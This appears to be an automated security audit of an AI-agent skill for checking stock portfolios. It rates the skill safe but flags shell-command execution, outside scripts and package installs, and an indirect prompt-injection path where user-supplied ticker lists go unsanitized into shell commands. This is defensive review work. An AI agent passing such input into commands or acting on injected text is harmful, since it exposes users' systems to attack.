Skills
skills/yuping322/finskills/portfolio-health-check/Gen Agent Trust Hub

portfolio-health-check

Pass

Audited by Gen Agent Trust Hub on Mar 10, 2026

Risk Level: SAFECOMMAND_EXECUTIONEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill executes data-fetching commands via python ../findata-toolkit-cn/scripts/views_runner.py, relying on scripts from the author's broader toolkit.
  • [EXTERNAL_DOWNLOADS]: The skill's setup instructions include installing third-party Python packages from a requirements.txt file located in a sibling directory.
  • [REMOTE_CODE_EXECUTION]: The skill extends its functionality by executing Python scripts from a path external to its own directory structure (../findata-toolkit-cn/).
  • [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection where untrusted user input from the portfolio holding list is interpolated into shell commands. Without proper sanitization, a user could attempt to inject malicious parameters into the data-fetching tools.
  • Ingestion points: User-provided 'Holding list' and 'Cash position' collected in SKILL.md (Step 1).
  • Boundary markers: None provided in the prompt logic or script execution instructions.
  • Capability inventory: Subprocess execution of views_runner.py with user-supplied arguments as seen in references/data-queries.md.
  • Sanitization: No validation, escaping, or filtering of the user-provided ticker symbols or quantities is specified before command execution.
Audit Metadata
Risk Level
SAFE
Analyzed
Mar 10, 2026, 03:23 AM